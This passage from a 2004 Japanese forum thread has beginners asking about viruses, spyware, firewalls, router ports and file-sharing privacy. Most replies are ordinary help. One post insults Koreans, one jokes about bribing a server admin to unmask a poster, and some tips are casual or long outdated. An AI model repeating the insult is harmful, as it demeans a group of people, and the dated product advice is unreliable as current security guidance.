328 :名無しさん@お腹いっぱい。:04/05/16 23:14
>>323
やっぱ英単語は駄目か。無作為に選んだ文字とかでやってみますか。

>>324
相手は何のつもりでメッセ登録を?それが分かりません。

329 :名無しさん@お腹いっぱい。:04/05/16 23:16
>>327
全く知らない人だったもので…不安に。題名も文字化けていてちんぷんかんぷんでして。

330 :名無しさん@お腹いっぱい。:04/05/16 23:20
>>329
スパムメールなんぞいくらでもくるぞ。
いやならオプションで迷惑メールの設定しなはれ。

331 :324:04/05/16 23:21
>>328
誰かにメンバとして登録されてたアドレスを
君が取得して、相手が電源入れたときにそれが
通知されたんじゃないかって意味。


332 :名無しさん@お腹いっぱい。:04/05/16 23:30
>>330
イエスサー。設定してきました。

>>331
ああ、なるほど。偶然って奴ですかね。

333 :名無しさん@お腹いっぱい。:04/05/16 23:42
パソコンノショシンシャデスケド、ウイルスガコワイデツ。

334 :名無しさん@お腹いっぱい。:04/05/16 23:47
>>333
報告ご苦労

335 :名無しさん@お腹いっぱい。:04/05/16 23:57
質問よろしくお願いします。

初心者なのですが、さっきデスクトップ上に見慣れないメモ張がありました。
「hs_err_pid2208」という全く見覚えのないもので、不振に思い開いたところ
An unexpected exception has been detected in native code outside the VM.
Unexpected Signal : EXCEPTION_ACCESS_VIOLATION occurred
と書かれています。

その下にはC:\WINDOWS\system32\USER32.dllみたいなのが沢山書かれています。
一週間くらい前に作られたようなのですが、スパイウェアか何かでしょうか?



336 :名無しさん@お腹いっぱい。:04/05/17 00:03
>>335
http://interstage.fujitsu.com/jp/faq/faq023021.html

337 :名無しさん@お腹いっぱい。:04/05/17 00:03
不審に思ったら開くな。
今すぐネットワーク切断してOS再インスコしな。

338 :335:04/05/17 00:08
あ、なるほど。
ログということで、そのままで大丈夫そうですね。
お騒がせしました。
ありがとうございました。

339 :名無しさん@お腹いっぱい。:04/05/17 01:17
ちょっとおせーてくらはい。
今まで、気がつかなかったんだけど、起動時に一瞬何かのウィンド(何かは早すぎて判らない)が出るんです。
今まで、SPYBOTとOUTPOSTは入れてました。
OSはXPでUPデート済みです。
気づいたのは、バスターをインストールした後。
インストール時は、LAN繋いだまま、SPYBOTとOUTPOSTをアンインストールしちゃいました。
バスターの検索では何も引っかからなかったんですが、心配です。
まずいっすか?

340 :名無しさん@お腹いっぱい。:04/05/17 01:31
>>339
プリンターの監視アプリなどが起動してるんじゃない?
バスター入れて遅くなって見えるようになったと。

341 :名無しさん@お腹いっぱい。:04/05/17 01:33
スタートアップ
タスク
Run
サービス

確認すべきものはたくさんあるな

342 :名無しさん@お腹いっぱい。:04/05/17 01:36
>>339
とりあえずFW消しちゃうのはいかがなものかと。
ルータ設定ちゃんとしてるならまだいいけどさ。

343 :名無しさん@お腹いっぱい。:04/05/17 03:16
AVG Free Edition の定義ファイルをup dateしてscanしたら

CMID32.dllがPSW.Banker.Oに
Winupd.exeがPSW.Banker.Pに感染とでますた。
healing不能(can not remove)です。

AVGのEncycropediaでもひっかかりません。
しまんてくとトレンドマイクロでscanしても感染なし、と出ます。
データベースにもありません。

駆除方法キボンヌ。

344 :名無しさん@お腹いっぱい。:04/05/17 04:04
>>339
それはバスターのウイルス緊急警告設定のやつだよ。

345 :名無しさん@お腹いっぱい。:04/05/17 07:17
質問します
パソコンの電源が落ちていればルータをネットに常に接続した状態にしても、セキュリティ上の問題はないのでしょうか?
例えばルータの設定をネット上から閲覧したり変更したりできるのでしょうか?

346 :名無しさん@お腹いっぱい。:04/05/17 08:42
>>345
ルータの設定による。
ウチは設定者のMACを限定してるけど、気休めかな。

347 :名無しさん@お腹いっぱい。:04/05/17 10:26
発信先「mail delivery subsystem」
タイトル「Returned mail: see transcript for details」
添付ファイルがついています。

というメールが来たんですが、あけても大丈夫でしょうか。

348 :名無しさん@お腹いっぱい。:04/05/17 10:30
>>347
誰かがあなたのアドレスを騙って、宛先不明であなたの元へ戻った物か、
バウンスを装ったウイルスメールか、のいずれか。自分で覚えがなければね。
実行ファイルでなければ開けても大丈夫だけど、捨てちゃってイイと思う。

349 :347:04/05/17 10:34
実は昨日、勧告大使館、勧告マスコミ3社に「日本海問題」
のことで抗議メールを出したので、ちょと心配です。

350 :347:04/05/17 10:41
>>348


宛先不明で戻ってきたメールという意味なんですね。
どっちみち気味悪いので削除します。

朝っぱらから、どうもありがとうございました。

351 :名無しさん@お腹いっぱい。:04/05/17 10:41
ヘッダの見方を知らない様だから、ググって調べてみれば?
そうすれば、自分が出したメールのバウンスかどうかが判る。

352 :名無しさん@お腹いっぱい。:04/05/17 11:34
TCPの1025にスキャン食らってるのですが、これはなに?

353 :名無しさん@お腹いっぱい。:04/05/17 11:37
>>352
http://grc.com/port_1025.htm

354 :名無しさん@お腹いっぱい。:04/05/17 11:42
>>353
ふうん・・よくわかんないけどSQL serverを狙ったワーム?
同じISPから来てるということは感染してるサーバーが同じISP内にあるってことかな

355 :名無しさん@お腹いっぱい。:04/05/17 12:10
2ちゃんに書き込んだ人が誰か知りたいのですが不可能ですか?

356 :名無しさん@お腹いっぱい。:04/05/17 12:16
個人では不可能。

357 :名無しさん@お腹いっぱい。:04/05/17 12:27
>>355
・弁護士雇う→損害賠償の訴訟起こす→裁判所の開示命令取る
・警察に被害届出す→警察がひろゆきのところに行く
・鯖管を大金で買収する
などすると2chのログを見ることができる。するとカキコごとにIPが
わかるから、そのIP持ってるプロバイダに対してユーザーの個人
情報を開示しろと、
・裁判所の開示命令取る
・警察(ry


358 :347:04/05/17 12:30
>>351
ありがとう!勉強になりました。
やっぱり昨日自分が勧告マスコミに出した
メールみたいでした。

359 :名無しさん@お腹いっぱい。:04/05/17 13:00
>>352

警察庁のWEBに情報がある

ttp://www.cyberpolice.go.jp/

360 :名無しさん@お腹いっぱい。:04/05/17 14:11
NIS 2003をつかっています。
侵入対策として、BlackICEを購入してみました。

NISはアンインストールしてしまったのですが、BlackICEの
プログラム制御の設定がちょっと難しいので、
NISでやることにしたいのですが、
BlackICEとNISの両方をインストールして稼動させても問題は
ないでしょうか。多少重くても平気です。

マシンは標準的なクロック2.4GクラスのデスクトップでXPHomeです。


361 :名無しさん@お腹いっぱい。:04/05/17 14:21
>>360
ここできくほうがいい
ttp://pc5.2ch.net/test/read.cgi/sec/1080120824/

おれんとこはBlackICEとゾヌとバスタ2004だけど何ともないよ
>>225はBlackICEが警告出してくれた

362 :名無しさん@お腹いっぱい。:04/05/17 14:21
パーソナルファイアーウォールソフトの多重起動はいろいろ不具合が出るのが通説
NISじゃなくNAVだったらよかったのに。

363 :名無しさん@お腹いっぱい。:04/05/17 15:16
マジレスお願いします。

家にデスクトップとノートの計2台のPCがあって、ルータを経由し
LANケーブルと無線LANでそれぞれつながっています。

ウィルス、たとえば.......
デスクトップのWinnyの「DOWN」フォルダをLAN内で共有したとします。
その中に「A」というファイルがあって、それが.exeのウィルスだったとします。

そのファイルをノートで開いたとすると、感染するのはどのPCですか?
ウィルス検知ソフトは、どちらもオフになっていたと仮定して。

364 :名無しさん@お腹いっぱい。:04/05/17 15:26
セキリュティ問題かどうかは判別出来ないのですが
HDD内のプログラムファイルに「xerox」と言う名のフォルダがあるのですが
これは何時インストールしたか記憶にないのです。
しかも削除しようと思ってもエラーメッセージが出て削除が出来ません。
ちなみにフォルダの容量は0バイトです。

もしかしてこれはウィルスなのでしょうか?
もしそうであるならどういった対応を取ればいいのかご教授願いたいです。
よろしくお願いします。

365 :名無しさん@お腹いっぱい。:04/05/17 15:31
>>363
キンタマ関係はダウソ板の方がいいかも知れませんよ

>>364
http://homepage2.nifty.com/winfaq/wxp/hints.html#1350

366 :363:04/05/17 15:43
>>365
いや、キンタマに感染したかもヤバイとかじゃなくて、
純粋に好奇心からどうなるのかな、と思いまして。

ネットワーク上の、別のPCのHDDにある.exeを実行すると、
レジストリやらファイルを書き換えられてしまうPCは
どれなんだろう、と。

367 :名無しさん@お腹いっぱい。:04/05/17 15:45
好奇心でもそっちいったほうがいいかも

368 :363:04/05/17 15:46
了解しました。ありがとうございます。

369 :名無しさん@お腹いっぱい。:04/05/17 15:50
>>365
安全なモノだったんですね。
どうもありがとうございました。

370 :名無しさん@お腹いっぱい。:04/05/17 16:42
ノートン2001入れてますが(ズボラしてほったらかし。でも一度win98再インスト
した時ノートンも再インストしましたが)
昨夜から不正侵入の警告が頻繁に出ますが、ノートンを更新してないため誤作動かと
思ったんですがそうでもないみたいですね。
今の不正侵入は2001では危ないですか?

371 :名無しさん@お腹いっぱい。:04/05/17 16:53
>>370
更新してないならソフト入れている意味ないです。
シマンテックのHPで調べてみては?(ウイルス検出とセキュリティスキャン)。

372 :名無しさん@お腹いっぱい。:04/05/17 17:15
>>366
基本的に実行したPCに感染する。
ウイルスによっては、感染したPCが使用している共有フォルダや、同一ネットワーク上のPCに対して感染しようとする。
例としては、企業のネットワークで、FWで外部からの不正アクセスを遮断しているにも関らず
ウイルスの感染が広がってしまうのは、FWの内側に感染したPCを持ち込んでしまい、そこから広がるケースが多い。

詳しい説明を端折ってるけど、これで良いか?

373 :345:04/05/17 17:48
>>346
ルータの設定方法を勉強してみます。
ありがとうございました。

374 :251=254:04/05/17 18:11
>>251>>254です

>>255さん、ありがとうございます
ルーターの設定はパケットフィルタでWAN側アクセスはできないようにしてます
パスワードは32文字の英大文字小文字数字の組み合わせを
ランダムに手打ちでつくってます
ルーターとPCのIPアドレスは、視覚的にわかりやすくするために
ここに貼り付ける際に、数字部分をよくあるプライベートアドレスに書き換えたので
実際には192.168.1.2というのは存在しません
クラスCですが、市販の家庭用ルーターのデフォルト設定では
存在しないIPアドレスだと思います。

こちらにどんなプライベートIPアドレスが存在してるのか
というのは、どんな方法でわかってしまうものなんでしょうか
すいません。お願いします

375 :名無しさん@お腹いっぱい。:04/05/17 18:27
24時間鯖にしてるマシンから、巨大なNETBIOSパケットを送りつけられて
PCを超スローモーにさせられたのですが、
これって誰かのいやがらせですよね?


376 :名無しさん@お腹いっぱい。:04/05/17 18:33
そうなんじゃない

377 :名無しさん@お腹いっぱい。:04/05/17 19:41
シマンテックのオンラインスキャンで

c:\WINDOWS\Downloaded Program Files\msits.exe は Backdoor.Jeem に感染しています。
c:\WINDOWS\Downloaded Program Files\x.exe は Trojan.StartPage に感染しています。

という結果が出たのですが、
エクスプローラで開いてみても
c:\WINDOWS\Downloaded Program Filesに上記のexeファイルがないのです。
手動で削除する事は出来ないのでしょうか。

378 :名無しさん@お腹いっぱい。:04/05/17 19:42
なんでシマンテックのサイトで探さないの?

379 :名無しさん@お腹いっぱい。:04/05/17 19:51
>>378
たるいんです

380 :名無しさん@お腹いっぱい。:04/05/17 20:02
>378
シマンテックのウイルス駆除ツールのページで
「Trojan.Qhosts」と「Backdoor.Winshell.50」を実行したのですが
両方とも”検出されなかった”という結果で終ってしまったので
手動でなんとかならんもんかと…

381 :名無しさん@お腹いっぱい。:04/05/17 20:11
質問!マジレスキボンヌ!

377=379ということでよろしいでしょうかYO?


382 :名無しさん@お腹いっぱい。:04/05/17 20:13
あ、377=380です

383 :名無しさん@お腹いっぱい。:04/05/17 20:16
全然関係ないかもしれませんが悔しかったので書き込まさせてください。
『ノートン インターネットセキュリティー2004』を購入しインストールしましたが
何かパソコンの待機時間(マウスポインターが砂時計状態)が長くなってしまい
全然仕事にならなくなってしまいました。
そこで『シマンテック』のサポートセンターに問い合わせましたが直らなかったため
アドバイス通り仕方なくアンインストールし またインストールし直しました。
ところが この作業をしましたら当方のパソコンのOSの一部が破損されてしまい
結局初期化せざるを得ない状況となってしまいました。
大変な時間と手間の浪費に腹が立って仕方がありません。
今では『ウイルスセキュリティ2004』という違う会社のソフトを
インストールしていますがこちらは非常に快適です。
『シマンテック インターネットセキュリティー2004』によって
私のパソコンは破壊されてしまい商品を返品したく返金を要求しましても返事すら来ませんでした。
シマンテックサポートセンターに対して何度も同じ請求の問い合わせをしましたが全くの無視です。
私は今も怒りと悔しさで いっぱいです。
皆さんも同じような経験はありませんか?

384 :名無しさん@お腹いっぱい。:04/05/17 20:22
>>383
訴訟を検討しろ。応援する。金ふぁ無いがな

385 :名無しさん@お腹いっぱい。:04/05/17 20:29
>>383
パッケージかマニュアルに「インストールに失敗しても責任は取らない」
云々の記載はないのか?

386 :名無しさん@お腹いっぱい。:04/05/17 20:49
すみませんが、ポートの塞ぎ方について教えて下さい。

ルータ・タイプのADSLモデムを使用しています。
NEC製 ATRR32
セキュリティチェック・サイトで確認すると、ポートの21(FTP)と23
(TELNET)がOPENという結果になります。これを塞ぎたいのですが、マニュ
アルを読んでもちんぷんかんぷんで…。ルータ購入元ACCAに聞いても、ポー
トの塞ぎ方はサポート外と言われました。

IPマスカレードという設定項目がありマニュアルの例の通り「使用する」設
定にしていますが、これは関係ないでしょうか?

387 :名無しさん@お腹いっぱい。:04/05/17 20:52
>>386
なぜNECに聞かんの?

388 :名無しさん@お腹いっぱい。:04/05/17 20:53
てかマジレスするなよ。

389 :386:04/05/17 21:11
>>387
モデムはDIYキットとして3年前にADSLコース提供のACCAから購入した物で、保証書
とかNECサポート先とかは一切入ってなかったんです。
こんな状況でNECに聞いても取り合ってもらえないのではないかと思い、こ
ちらで質問させてもらいました。

390 :名無しさん@お腹いっぱい。:04/05/17 21:12
JS.Downloader.Trojanというのに感染したみたいです
どうすれば治りますか?

391 :名無しさん@お腹いっぱい。:04/05/17 21:13
>>390
JS.Downloader.Trojanを駆除すれば直ります
いや、ホント

392 :名無しさん@お腹いっぱい。:04/05/17 21:14
質問させてください。
“muiexec.exe”と“Idle”っていうヤツが外部(TCP64444)へ接続しようと試みまくりなんですが、
これって何者ですか?

昨日からNortonAntiVirusが突然止まったり、
regeditやエクスプローラーが勝手に閉じられたりと挙動不信です。
system32\drivers\etc\hostsも勝手に書き換えられたりします。
でも、「トレンドマイクロ社システムクリーナ」ではウイルスは検出されません。

muiexec.exeを強制終了すると問題が発生しないようなので、
レジストリのCurrentVersion\runから削除しようかと思うのですが、
消しちゃって大丈夫ですかね?


393 :名無しさん@お腹いっぱい。:04/05/17 21:15
>>391
その方法を教えてください

394 :名無しさん@お腹いっぱい。:04/05/17 21:17
>>393
クリリン インストール

395 :名無しさん@お腹いっぱい。:04/05/17 21:18
>>386
ISP板逝け。

396 :392:04/05/17 21:21
OSはWindows2000 5.00.2195 ServicePack4
セキュリティソフトは、NortonAntiVirus2004を使用していましたが
挙動不審になってからアンインストールし、
改めてウイルスバスター2004をインストールしました。

よろしくお願いしますm(__)m

397 :名無しさん@お腹いっぱい。:04/05/17 21:22
windowsXPのファイアーウォールについて聞きたいのですが

繊細設定で
msmsgsのTCPとUDPのポートが勝手に開いて、またそれを削除してもローカルエリア接続を有効にしたりすると、msmsgsのTCPとUDPのポートが作成されてポートが開いてしまいます。
いろんなウイルス駆除ソフトを使ってもウイルスは発見されませんので、設定上の問題だと思っています。
どうすれば、msmsgsのポートが開かないようにできるんでしょうか?


398 :名無しさん@お腹いっぱい。:04/05/17 21:27
>>394
意味がわかりません
どういうことでしょうか?

399 :名無しさん@お腹いっぱい。:04/05/17 21:29
クリリンのことか〜!というAAキボンヌ

400 :名無しさん@お腹いっぱい。:04/05/17 21:31
>>392
ぐぐって1件もヒットしないファイルはすごーくあやしい。
バスターのスキャンの結果は?
>>397
仕様です。他社のFWつこてください。

401 :392:04/05/17 21:43
>>400
バスターでは受信メールのゴミ箱内からNetSkyとかが色々出てきましたが、
他は検出されませんでした。muiexecもウイルスとしては認識されません。

ちなみに、muiexec.exeは、system32フォルダ内で、
作成日時は2004年5月16日、22:44:56
更新日時が2004年5月16日、21:55:34
ちょうど挙動不審になったのとほぼ同時です。。。
新種なんだろうか・・・・・??

レジストリには、\Run と\RunServicesの
“MUIServer Windows Uninstaller”に“muiexec.exe”が書き込まれています。


402 :名無しさん@お腹いっぱい。:04/05/17 21:44
スパイウェアじゃないの・・・?

403 :名無しさん@お腹いっぱい。:04/05/17 21:45
消せば

404 :矢風:04/05/17 21:50
散々外出だと思いますが、Norton2004をいれてからさかんに
「リモートシステムがこのコンピュータ(INAZUMA.exeのときもありました
検索Ninjaという検索ソフトのファイルみたいです)にアクセスしようと
しています<高危険度>遮断(推奨)」と出るようになりました…
特に何かDLしようとしているときではなく、何もしてないときにも
しょっちゅう出ます…。
今のところ推奨といわれるがままに遮断しています。(2回くらい許可しちゃったけど)
検索していろいろ探したんですが、

1.この文章の意味が結局何を意味しているのか
   (誰にどういうことをされているのか、ウイルスには関係あるのか
    私には、またはその他の人にどのような被害があるのか)
2.許可してしまったらどうなるのか
3.これからの対策どうすればいいのか(ルーター?がどうのこうのとか…)

わかりません…何せ初心者で(>_<)
どうぞ誰か教えてくださいませm(_ _)m



405 :392:04/05/17 21:52
>>402-403
やっぱりそうかな・・・・
MUIとか書いてあるからWindowsの機能の一部? とも思ったりしたんだけどね。。。
とりあえず、muiexec.exeのファイル名変えて様子見てみます。
何かご存知の方がいたら、引き続き情報提供きぼん。


406 :名無しさん@お腹いっぱい。:04/05/17 21:54
本日のTVタックルにて個人情報の売買人が出演し、13桁の暗号が3・4分(10分くらいだったかも?)で解読できると言っていました。
現在ではこのようなことが可能なのですか?


407 :名無しさん@お腹いっぱい。:04/05/17 21:58
>>406
13桁の暗号 ????????????

408 :名無しさん@お腹いっぱい。:04/05/17 22:15
すみませんがご教授ください。
先日WindowsXPを購入しました。
ヤフーBBを契約したんですが、その際にシマンテックのファイアーウォールが
5ヶ月分ほどサービスでついてきました。でもXPについてる
ファイアーウォールもシマンテックのものですよね?
この手のものを複数いれるのはよくない、と聞いたんですが
ふたつ同じ(?)ものが入っていても、これは別に問題はないんでしょうか?
同じ会社のものなら大丈夫ですか?

409 :名無し:04/05/17 22:24
パニくって書き込んでます。

HTML NETSKY.P の駆除方法がわかりません。
いろいろ調べたらW32 NETSKY.Pってやつの駆除ツールがあって
それを試したんですが、効果なし。

自分で調べろってのは当たり前ですが、そこをなんとかご教授お願いします。

410 :名無しさん@お腹いっぱい。:04/05/17 22:29
>>408
同会社とか同製品とか関係なく、「ファイアウォールが2つある事」がトラブルの元。
>>397
WinXPのファイアウォールを使った事はないんだが、「繊細設定」っていう語句なのか?

411 :名無しさん@お腹いっぱい。:04/05/17 22:31
>>409
駆除ツールを使ったけど効果なし、ってどういう事?
いると報告してくるけど駆除まではしないの?
それともいないと報告してくるの?

412 :名無しさん@お腹いっぱい。:04/05/17 22:33
>>406 http://whatname.hp.infoseek.co.jp/

413 :名無しさん@お腹いっぱい。:04/05/17 22:35
>>407
ログインパスワードのことかと思われますが、「暗号」と言っていました。

414 :名無し:04/05/17 22:36
>411


当方ウイルスセキュリティーしておりませんでした(その時点でアフォ)。

たまたまドレンドマイクロの無料スキャンを利用してウイルス発見しました。
その時駆除は出来ませんとなっていたんです。

あわててインターネットで調べてNETSKY.P用の駆除ツールを使ったのですが
効果なしです。


415 :名無しさん@お腹いっぱい。:04/05/17 22:37
>>408
XPのファイアウォールはシマンテックとは関係ない
ノートン入ってるならXPのFWは無効にしてノートンだけで良いのでは?

416 :408:04/05/17 22:44
>>410
ありがとうございます。
てことは、とりあえずXPのほうのファイアーウォールは切っといて、
サービスでついてきたほうのを5ヶ月間使い、期限がきれたら
またそっちを設定すればいいんですね。


417 :408:04/05/17 22:49
>>415
あ、あれ?
じゃぁNISのアプリケーションと、XPついてるFWはまた別モノですか?
二つを混同してたのかな。
なんせ昨日パソコン届いたばっかりなもので・・。

418 :名無しさん@お腹いっぱい。:04/05/17 22:51
>>414

HTML_NRTSKY.Pは単純にメールを削除しろってさ。
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=HTML_NETSKY.P

419 :418:04/05/17 22:52
ありゃ。スペルまちがった


420 :名無しさん@お腹いっぱい。:04/05/17 22:55
>>417
>なんせ昨日パソコン届いたばっかりなもので・・。
こんなとこに来る前に当然Windous Updateは済ませたよなぁ。

421 :矢風404:04/05/17 23:03
>>404の返信どうぞよろしくお願いします

422 :408:04/05/17 23:04
>>420
あ、いえ、これは前のパソコンから書きこんでるんです・・。
(こっちは98です。)
買ったばかりのほうはまだインターネット設定もなにもしてない状態で
こちらで疑問点を伺ってからにしようかと思ったので・・。

423 :名無しさん@お腹いっぱい。:04/05/17 23:05
セキュリティーホールとラッキーホールの違いってなんですか?

424 :名無しさん@お腹いっぱい。:04/05/17 23:11
↑ パチンコ屋さんにでもいったらどうぞw

425 :名無しさん@お腹いっぱい。:04/05/17 23:23
>>421
どうぞよろしく、じゃねェだろ。
なぜ自分が持ってるソフトなのに、そのマニュアルを見ようとしない?
どういう時にどういうメッセージが出るか位は書いてあろうに。

426 :名無し:04/05/17 23:26
>418
ありがとうございます。

ウイルスはTEMPORARYINTERNETFAILESの中に
あると出てるんですが、見つかりません。
ファイルは全て表示としているのに・・・。 

427 :名無しさん@お腹いっぱい。:04/05/17 23:32
>>426
IEのオプションからキャッシュの表示をしてみそ。
キャッシュを消せば一緒に消えると思われ。

428 :名無しさん@お腹いっぱい。:04/05/17 23:36
>>421
1.ちょっと意味が変わってしまうが、「リモートシステム」を「何者かが」
 って置き換えたらわかるでしょ。人がやってる場合とワームなどの悪質
 なプログラムがやってる場合があるけどね。
2.概ねえらい目に合う。
3.ルータ入れれば静かになる。

ということでいいかな?
もすこし自分で考えてみようよ。


429 :名無しさん@お腹いっぱい。:04/05/17 23:45
韓国から不正アクセス大杉!!!
氏ねバ韓国!!!

430 :名無し:04/05/18 00:01
>426

ありがとうございます。

IE→オプション→一時ファイル消去ってことですよね?
やってみて再びトレンドマイクロのウイルス検索をしたんですが
またでてきちゃいました。欝

このウイルスはあっても特に害はないようですが、
やっぱ気分が悪いのでなんとか消し去りたいのですが・・・。

431 :名無しさん@お腹いっぱい。:04/05/18 00:05
win2000なんですが、ローカルエリアの接続状態をみると
こちらから送信はほとんどしてないのに(ネット閲覧等)
なぜか送信パケットがやたらあります。
(1時間で送信パケット2000、受信パケット1900)
これくらいが普通なんでしょうか?

432 :名無しさん@お腹いっぱい。:04/05/18 00:10
>>431
普通


433 :名無しさん@お腹いっぱい。:04/05/18 00:20
>>430
インターネット一時ファイルの中から検出されるの?
単なる思い付きだからうまくいくかどうかわからないけど
インターネットオプション→設定→フォルダの移動
でTemporaryInternetFilesフォルダを別の場所に移動してから
古いほうのフォルダごと削除してみて。

434 :431:04/05/18 00:22
>>432
ありがとうございます。
スパイウェアか何かが入っているんじゃないかと思ったんですが。
これは何のパケットを送信しているんでしょうか。。

435 :名無し:04/05/18 00:28
>430

お付き合いありがとうございます。

ローカルセッティング¥テンポラリーインタネットファイルズ¥CONTENT.IE5
のなかにあるファイルが感染しているようです(英語とカタカナ使い分けてすみません)。
ここまでたどり着けないんです。

明日早いから早く寝たいのに・・・。

436 :名無しさん@お腹いっぱい。:04/05/18 00:30
>>435
辿り着けないって、パスが判らないって事?
C:\Documents and Settings\《ユーザ名》\Local Settings〜
でどうよ。

437 :名無しさん@お腹いっぱい。:04/05/18 00:35
>>431
>こちらから送信はほとんどしてないのに(ネット閲覧等)
この部分見てる限り、勘違いしてると思うんだけど
ネット閲覧にしても何にしてもパケットはビシバシ送信してます。
もちろん、ウイルスやらスパイウェア仕業という可能性もある。

438 :名無し:04/05/18 00:43
>436

手間取らせてすんません。

おっしゃってるLocal Settingsの次のテンポラリーインターネットファイルズ
まではいけるんですけど、その後にCONTENT.IE5 っていう(たぶんフォルダ)がないんです。
たどり着けないと言うのはそういう意味で。


439 :名無しさん@お腹いっぱい。:04/05/18 00:45
MXやってたら名前がばれたんだけど、ありえる?
ガクガク(((n;‘Д‘))η

440 :名無しさん@お腹いっぱい。:04/05/18 00:48
>>439
ありえる。
たぶんあんたが不注意なだけ。

441 :名無しさん@お腹いっぱい。:04/05/18 00:50
どういうことが不注意ですか?

442 :名無しさん@お腹いっぱい。:04/05/18 00:51
初心者がMXなんぞやるなっつーことですよ。

443 :名無しさん@お腹いっぱい。:04/05/18 00:53
まじで〜。個人情報とかばれる?

444 :名無しさん@お腹いっぱい。:04/05/18 00:56
>>441
どうせC:\Documents and Settings\ユーザ名\
の下に共有フォルダ置いてるんだろ。
nyからmxに厨が大量に流れ込んでるみたいだが、
悪い事言わんからやめとけ。


445 :名無しさん@お腹いっぱい。:04/05/18 01:01
アプリケーションソフトを使用していたら
突然操作不能になって起動不能になってしまいました。
ウィルスなんでしょうか?

446 :名無しさん@お腹いっぱい。:04/05/18 01:02
ほんとだ〜!きづかなかった〜。ありがとう

447 :名無しさん@お腹いっぱい。:04/05/18 01:31
>>445
ウィルスかと思ったらウィルススキャンしろ。

448 :名無しさん@お腹いっぱい。:04/05/18 01:35
セキュリティーホールとマンホールの共通点は?

449 :名無しさん@お腹いっぱい。:04/05/18 01:45
トレンドマイクロのオンラインスキャンで
TROJ_REVOP.A というウイルスをハケーンしたんですが、
どうすれば駆除できますか?トロイは初めてなんでよくわかりませぬ。

450 :名無しさん@お腹いっぱい。:04/05/18 01:47
>>444
フォルダ名変更できないのですが、おしえていただけませんか?

451 :名無しさん@お腹いっぱい。:04/05/18 01:47
>>448
危機管理対策が必要。
ttp://www.fujilatex.co.jp/

452 :名無しさん@お腹いっぱい。:04/05/18 01:49
プロセスにいつもいるsvchost.exeというファイルはどんな役目があるのですか?OSはWin2000です。

453 :448:04/05/18 01:58
>>451
んまい!惚れた!

454 :名無しさん@お腹いっぱい。:04/05/18 02:05
>>452
名前の通り、各種サービスの主人です。

455 :名無しさん@お腹いっぱい。:04/05/18 02:09
>>450
釣りですか?

456 :名無しさん@お腹いっぱい。:04/05/18 07:27
>>449
おれもオマイみたいにトロイ香具師は初めてだ
トレンドマイクロで見つけたなら、トレンドマイクロのウイルスデータべ−スで調べれ

457 :矢風404:04/05/18 09:02
>>425 すいません…m(__)mシマンテックのホームページやらなにやらいろいろ
見てみたのですけれど専門用語ばかりでよくわからなくて…(恥)

>>428 ありがとうございます!プログラムの場合もあるのか…。
ルーターか、もうすこし調べてみますm(__)m

458 :名無しさん@お腹いっぱい。:04/05/18 09:53
日本一ハイレベルな馬鹿一覧
ttp://www.senderbase.org/search?searchString=u-tokyo.ac.jp

459 :名無しさん@お腹いっぱい。:04/05/18 10:12
spam mail関係の板どっかにないですかね?
知ってる人教えて

460 :名無しさん@お腹いっぱい。:04/05/18 10:18
>>459
自分で探せ


461 :名無しさん@お腹いっぱい。:04/05/18 13:23
トロイの木馬に感染してるサイトを見ちゃったんですけど
ノートン先生が「このファイルは修復できません」だの「ファイルへのアクセスは拒否されました」みたいな反応をしたんですよ
これってもうすでにパソは感染しちゃったって事なんでしょーか?

462 :名無しさん@お腹いっぱい。:04/05/18 13:47
質問なのですが、2chの特定のスレを見た時だけノートンが反応して
「コンピュータ上にウィルスを検出しました」と表示されます。
スキャンして対処した後も、そのスレに行くと同じ事になります。
他の人は何も無いようです。何が原因でしょうか?
宜しくお願い致します。

463 :名無しさん@お腹いっぱい。:04/05/18 13:53
>>462
それは有名なノートンの誤検知

464 :名無しさん@お腹いっぱい。:04/05/18 13:59
>>459
通信行政・メディア管理@2ch掲示板
http://society.2ch.net/regulate/

>>461
Norton AntiVirus でウイルスに感染したファイルを検出すると「修復できませんでした。……アクセスが拒否されました。」というメッセージが表示される
http://service1.symantec.com/SUPPORT/INTER/navjapanesekb.nsf/11ea5eb60c47e5c085256c470046ed2f/a1b618b82787bdc649256e5b002696f2

>>462
ノートンがvbsウィルスのソースに誤反応2 (PCQA板)
http://pc5.2ch.net/test/read.cgi/pcqa/1033948204/l50

465 :462:04/05/18 14:05
>>463
>>464
有難う御座いました。安心しました。

466 :名無しさん@お腹いっぱい。:04/05/18 14:12
ノートンでは全く異常なしなんですけどさっきspybotでスキャンしてみたら問題箇所が29箇所も検出されちゃいました
ノートンで引っかからないものは基本的に飼ってても大丈夫でしょうか?
下手に削除してpcの調子がおかしくなるのも嫌だし・・・

467 :名無しさん@お腹いっぱい。:04/05/18 14:15
>>466
     ●【緊急】 早く治したい方は以下を実行して下さい 【処置】●

   WEB設定のリセットは、こまめに実行しましょう(無限ループ防止の為) 

1)IEのホーム、検索ページを標準に戻す→ツール→インターネットオプション→プログラム→WEB設定のリセット

2)IEの履歴削除→ツール→インターネットオプション→全般→インターネット一時ファイル→クッキーの削除+ファイルの削除

3)削除したいファイルがあるが「アクセスできません。使用中です」等といわれて削除できない→セーフモード(F8を連打)でOSを起動→削除→OS再起動

4)勝手に追加されたアプリをアンインストする→スタート→コントロールパネル→アプリケーションの追加と削除(JWordはここでアンインストする)→OS再起動

5)ブラウザジャッカーCoolWebSearch駆除ツール CoolWebShredderをDL
  http://users.hoops.ne.jp/ee94012/hayanet21st/index-1.htm  →OS再起動

6)定番スパイウェア除去ソフト↓をインストール(併用推奨)

 ・定番 スパイウェア除去ソフト Ad-Aware 使用法
  http://www.oct-net.ne.jp/~missile/altoegoh/r.htm
 ・定番 スパイウェア除去ソフト Spybot-S&D 使用法
  http://perso.wanadoo.es/lsmagsupermix1/

7)Me/XPの場合「システムの復元」で正常な状態に復帰させる方法もあります。
 [スタート]→[すべてのプログラム]→[アクセサリ]→[システム ツール]→[システムの復元]

468 :466:04/05/18 14:26
>>467
どうもご丁寧にありがとうございましたm(_ _)m
やってみます

469 :名無しさん@お腹いっぱい。:04/05/18 14:28
質問させてください。Live2ちゃんに変更したのですが、ウイルスバスターの
通信設定許可をしてください。と書いてあったんですがウイルスバスターの通信設定をしないと
どうなりますか?Live2ちゃんが使用できないのですか?それともウイルスバスターが機能しないのでしょうか?
ウイルスバスターは2004を使ってます。OSはXPです。

470 :名無しさん@お腹いっぱい。:04/05/18 14:36
>>469
Live2ちゃんが使えればそれでよし
もしつながらなければバスターの通信設定許可しろと言う意味

471 :名無しさん@お腹いっぱい。:04/05/18 14:39
>>470
ものすごく安心しました。ありがと。

